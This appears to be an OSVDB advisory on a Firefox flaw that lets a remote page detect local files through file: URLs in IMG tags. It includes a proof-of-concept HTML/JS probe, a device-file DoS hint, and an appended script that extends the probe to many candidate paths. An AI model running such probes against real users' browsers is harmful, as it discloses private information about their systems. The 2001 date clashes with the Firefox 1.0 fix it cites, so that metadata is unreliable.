Mozilla Firefox IMG Tag Remote File Existence Verification

2001-02-16T05:17:09
ID OSVDB:11590
Type osvdb
Reporter Gabriel Cabillón, Wolfgang Schwarz
Modified 2001-02-16T05:17:09

Description

Vulnerability Description

Firefox contains a flaw that may allow a malicious user to determine the existence of files on a victim's local disk. A remote page references a local file through a file: URL in an IMG tag and then uses script to test whether the image was successfully included, for example by comparing its rendered width with that of a known-nonexistent image. The flaw may allow the attacker to determine the existence of local images, disclose information, or cause a DoS by referencing a device file, resulting in a loss of confidentiality and/or availability.

Solution Description

Upgrade to version 1.0 Preview Release or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Firefox allows a remote page to reference local files via file: URLs in IMG tags and to test from script whether each one loaded, disclosing the existence of local files and permitting a DoS via device files.

Manual Testing Notes

A DoS can be caused by referencing a device file (e.g. "/dev/tty0") as the image source on some systems.

The following tests whether an image is on the victim's computer. The first IMG is a reference that is known not to exist; the second is the probe. If the two render with different widths, the probe loaded, so the file exists:

<!-- Reference image that is known not to exist; it fails to load -->
<img src="file:///c|/nonexistent/content.gif">
<!-- Probe image; loads only if the file exists on the victim's disk -->
<img src="file:///c|/windows/content.gif">

<script>
onload = function () {
    // A probe that fails renders with the same width as the broken
    // reference image; a different width means the file loaded.
    var incl = (document.images[0].width != document.images[1].width) ? "" : "not ";
    alert("Windows is " + incl + "installed in C:/WINDOWS/");
};
</script>
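The following is an added example, not code from the advisory or its reporters. It generalises the width-comparison probe above to a list of candidate files and separates the decision rule from the DOM so it can be checked outside a browser. Only the C:/WINDOWS/content.gif path comes from the advisory; the other candidate paths, the sample widths and the function names are assumptions.

```javascript
// Added example (not from the advisory): generalises the width-comparison
// probe from the Manual Testing Notes to a list of candidate files.
// The decision logic is kept pure so it can be exercised outside a browser;
// the DOM part runs only when `document` exists. All paths below other than
// C:/WINDOWS/content.gif are constructed assumptions.

// Reference image assumed never to exist on the victim's disk (from the advisory).
const BASELINE_URL = "file:///c|/nonexistent/content.gif";

// Candidate local images to test for (the first one is the advisory's own path).
const CANDIDATE_URLS = [
  "file:///c|/windows/content.gif",
  "file:///c|/Program%20Files/example/logo.gif", // assumed path
  "file:///c|/temp/cache.gif",                    // assumed path
];

// Pure decision rule: the baseline is a broken image, so any probe whose
// rendered width differs from it actually loaded, i.e. the file exists.
function classifyProbe(baselineWidth, probeWidth) {
  return probeWidth !== baselineWidth ? "exists" : "missing";
}

// Turn measured widths into a report. `measured` is [{url, width}, ...].
function buildReport(baselineWidth, measured) {
  return measured.map(({ url, width }) => ({
    url,
    width,
    verdict: classifyProbe(baselineWidth, width),
  }));
}

// True when every probe looks like the baseline. On a browser that refuses
// file: subresources from a remote page (the behaviour the fix introduces),
// every image fails the same way, so this means "blind", not "all absent".
function probeIsBlind(report) {
  return report.every((r) => r.verdict === "missing");
}

// Browser side: load one URL into an <img> and report its rendered width.
// onerror is wired too, because a broken image still has a measurable width.
function loadAndMeasure(url) {
  return new Promise((resolve) => {
    const img = document.createElement("img");
    const done = () => resolve({ url, width: img.width });
    img.onload = done;
    img.onerror = done;
    img.src = url;
    document.body.appendChild(img);
  });
}

// Run the full probe: measure the baseline first, then every candidate.
async function probeAll(urls = CANDIDATE_URLS) {
  const baseline = await loadAndMeasure(BASELINE_URL);
  const measured = await Promise.all(urls.map(loadAndMeasure));
  return buildReport(baseline.width, measured);
}

// Constructed measurements standing in for a vulnerable browser, so the
// report logic can be checked offline: the Windows probe loaded (width 16),
// the two assumed paths did not (same width as the broken baseline, 0).
const SAMPLE_MEASUREMENTS = [
  { url: CANDIDATE_URLS[0], width: 16 },
  { url: CANDIDATE_URLS[1], width: 0 },
  { url: CANDIDATE_URLS[2], width: 0 },
];

function sampleReport() {
  return buildReport(0, SAMPLE_MEASUREMENTS);
}

if (typeof document !== "undefined") {
  // In a browser: run the live probe and show the verdicts.
  probeAll().then((report) => {
    console.log(probeIsBlind(report)
      ? "probe is blind: file: loads are being refused"
      : JSON.stringify(report, null, 2));
  });
}
```

The baseline is measured rather than assumed to be zero because a failed image's rendered width depends on the browser (some draw a placeholder icon). When every probe matches the baseline, treat the result as inconclusive: that is exactly what a browser with the fix applied looks like, since it refuses file: loads from a remote page regardless of whether the file exists.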

References:

Vendor URL: http://www.mozilla.org/
Vendor Specific News/Changelog Entry: https://bugzilla.mozilla.org/show_bug.cgi?id=69070
Secunia Advisory ID: 13144
Related OSVDB ID: 11591
Related OSVDB ID: 11592